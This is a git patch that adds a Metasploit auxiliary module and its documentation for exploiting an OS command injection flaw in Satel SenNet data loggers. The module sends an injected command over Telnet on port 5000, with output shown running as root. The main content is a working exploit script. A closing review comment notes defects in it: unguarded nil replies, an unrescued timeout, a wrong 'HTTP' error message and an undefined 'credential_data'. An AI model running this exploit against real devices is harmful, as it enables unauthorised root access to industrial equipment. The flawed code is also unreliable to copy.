From e65eacce49523f8fdee1a42d1b367f9d7b1c4882 Mon Sep 17 00:00:00 2001
From: juushya
Date: Fri, 7 Apr 2017 02:22:11 +0530
Subject: [PATCH] Add Satel SenNet Command Exec Module
---
 .../scanner/telnet/satel_cmd_exec.md | 23 +++++
 .../scanner/telnet/satel_cmd_exec.rb | 86 +++++++++++++++++++
 2 files changed, 109 insertions(+)
 create mode 100644 documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md
 create mode 100644 modules/auxiliary/scanner/telnet/satel_cmd_exec.rb
diff --git a/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md b/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md
new file mode 100644
index 0000000000..0ab3e89e80
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md
@@ -0,0 +1,23 @@
+This module exploits an OS Command Injection vulnerability in Satel SenNet Data Loggers to perform arbitrary command execution as 'root'.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Sample Output
+
+ ```
+msf > use auxiliary/scanner/telnet/satel_cmd_exec
+msf auxiliary(satel_cmd_exec) > set rhosts 1.3.3.7
+msf auxiliary(satel_cmd_exec) > run
+
+[*] 1.3.3.7:5000 - Sending command now - id;
+[+] 1.3.3.7:5000 - uid=0(root) gid=0(root)
+[+] 1.3.3.7:5000 - File saved in: /root/.msf4/loot/20000000000004_1.3.3.7_cmdexeclog_528409.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+ ```
diff --git a/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb b/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb
new file mode 100644
index 0000000000..a8be39ab8c
--- /dev/null
+++ b/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::Telnet
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Satel SenNet Data Logger Privileged Shell Arbitrary Command Execution Vulnerability',
+ 'Description' => %q{
+ This module exploits an OS Command Injection vulnerability in Satel SenNet Data Loggers to perform arbitrary command execution as 'root'.
+ },
+ 'Author' =>
+ [
+ 'Karn Ganeshen '
+ ],
+ 'DisclosureDate' => 'Apr 07, 2017',
+ 'License' => MSF_LICENSE,
+ 'DefaultOptions' => { 'VERBOSE' => true })
+ )
+
+ register_options(
+ [
+ Opt::RPORT(5000),
+ OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30]),
+ OptString.new('CMD', [true, 'Command(s) to run', 'id; pwd;'])
+ ], self.class
+ )
+
+ deregister_options('USERNAME', 'PASSWORD')
+ end
+
+ def report_cred(opts)
+ service_data = {
+ address: opts[:ip],
+ port: opts[:port],
+ service_name: opts[:service_name],
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+
+ login_data = {
+ last_attempted_at: Time.now,
+ core: create_credential(credential_data),
+ status: Metasploit::Model::Login::Status::SUCCESSFUL,
+ proof: opts[:proof]
+ }.merge(service_data)
+
+ create_credential_login(login_data)
+ end
+
+ def run_host(ip)
+ to = (datastore['TIMEOUT'].zero?) ? 30 : datastore['TIMEOUT']
+ begin
+ ::Timeout.timeout(to) do
+ command = datastore['CMD']
+ inject = '$true; ' + "#{command}"
+ res = connect
+
+ print_status("Sending command now - #{command}")
+
+ sock.puts(inject)
+ data = sock.get_once(-1, 5)
+
+ print_good("#{data}")
+
+ loot_name = 'cmd-exec-log'
+ loot_type = 'text/plain'
+ loot_desc = 'Satel SenNet CMD Exec Dump'
+ p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)
+ print_good("File saved in: #{p}")
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+ print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+ return false
+ ensure
+ disconnect
+ end
+ end
+end
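Review bot: `run_host` records a finding whatever comes back: `data = sock.get_once(-1, 5)` can be nil or empty when the host stays silent (as far as I know `get_once` returns nil on a read timeout), yet the following lines call `print_good` and `store_loot` unconditionally, so any service answering on port 5000 ends up as loot in the workspace. Guard the result before reporting, e.g. `if data.nil? || data.empty?` with `print_error("#{rhost}:#{rport} - No response to command")` and `return`, and preferably check the reply for the expected output rather than accepting any bytes. `::Timeout.timeout(to)` raises `::Timeout::Error`, which is missing from the `rescue` list, so a slow host bypasses the handler; the handler's text also says "HTTP Connection Failed" although this is a raw TCP/Telnet connection. `report_cred` is never called in this file and references `credential_data`, which is not defined anywhere in it, so it would raise NameError if used and can be dropped along with the unused `res = connect` assignment.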